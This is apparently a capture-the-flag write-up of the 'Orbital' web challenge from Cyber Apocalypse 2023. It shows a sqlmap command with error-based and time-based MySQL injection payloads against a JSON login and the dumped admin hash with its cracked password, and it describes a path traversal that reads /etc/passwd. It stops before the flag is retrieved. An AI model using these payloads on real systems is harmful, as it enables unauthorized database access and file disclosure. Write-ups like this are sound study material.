web

Cyber Apocalypse 2023

Orbital

Solved by Legend

Challenge description

In order to decipher the alien communication that held the key to their location, she needed access to a decoder with advanced capabilities - a decoder that only The Orbital firm possessed. Can you get your hands on the decoder?

In this challenge also a login page is their.

And with no user info or details in source code I checked the docker files.

This challenge is similar to the Drobots challenge. It’s running Flask application with MySQL. So I looked into the docker file.

The config.py contains the database config info.

And database.py contain the database logic along with the hint but it is modified a little. This time the password is getting verified with passwordVerify.

I again saved the request and gave it to sqlmap which gave me the token and also bruteforced the password.

sqlmap -r ./req --dbms=mysql -D orbital -T users --dump


---
Parameter: JSON username ((custom) POST)
    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: {"username":"a"="a" AND (SELECT 2720 FROM(SELECT COUNT(*),CONCAT(0x716a7a6271,(SELECT (ELT(2720=2720,1))),0x71786a7671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a) AND "a"="a","password":"a"}

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: {"username":"a"="a" AND (SELECT 1000 FROM (SELECT(SLEEP(5)))dfxy) AND "a"="a","password":"a"}
---


+----+-------------------------------------------------+----------+
| id | password                                        | username |
+----+-------------------------------------------------+----------+
| 1  | 1692b753c031f2905b89e7258dbc49bb (ichliebedich) | admin    |
+----+-------------------------------------------------+----------+

Now once logged in the functionality of the website was different.

Now I checked the routes.py file which contained a logic of the application. Here in the logic of communication the hint was given that the file escape for characters are not there for the filename.

Then I tried the path traversal to get the /etc/passwd file. It worked.

For this challenge they changed the location of the flag name from flag.txt to signal_sleuth_firmware in root which is written in the docker config.

COPY flag.txt /signal_sleuth_firmware

Now we need to get the flag.

Published on : 27 Mar 2023